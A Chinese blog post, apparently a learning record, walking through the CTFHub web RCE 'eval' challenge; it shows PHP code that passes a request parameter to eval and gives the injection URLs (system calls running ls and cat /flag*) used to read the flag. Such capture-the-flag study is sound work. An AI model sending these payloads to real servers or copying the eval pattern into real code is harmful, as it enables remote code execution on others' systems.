CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
进阶小白猿12 分钟前
Java技术八股学习Day13
java·jvm·学习
行业探路者24 分钟前
二维码制作工具使用指南:如何利用电脑摄像头轻松扫描和生成图片二维码
大数据·人工智能·学习·产品运营·软件工程
坏柠24 分钟前
从点亮一颗 LED 开始:ESP32-S3 GPIO 输出的正确学习方式
学习
如果你想拥有什么先让自己配得上拥有28 分钟前
三阶幻方了解-七年级上册
学习·总结
木木木一43 分钟前
Rust学习记录--C8 常用的集合
开发语言·学习·rust
星火开发设计1 小时前
Python数列表完全指南:从基础到实战
开发语言·python·学习·list·编程·知识·期末考试
朔北之忘 Clancy1 小时前
2025 年 6 月青少年软编等考 C 语言一级真题解析
c语言·开发语言·c++·学习·算法·青少年编程·题解
叫我:松哥2 小时前
基于 Flask 框架开发的在线学习平台,集成人工智能技术,提供分类练习、随机练习、智能推荐等多种学习模式
人工智能·后端·python·学习·信息可视化·flask·推荐算法
东心十2 小时前
AI学习环境安装
人工智能·学习
Hooray112 小时前
入门_本地项目上传到GitCode上面
学习·gitcode
热门推荐
01GitHub 镜像站点02安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)03Labelme从安装到标注:零基础完整指南04Linux下V2Ray安装配置指南05手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!06【踩坑笔记】50系显卡适配的 PyTorch 安装07jdk21下载、安装(Windows、Linux、macOS)08GitLab 零基础入门指南:从安装到项目管理全流程09Opencode CLI 安装成功,但是启动失败10UV安装并设置国内源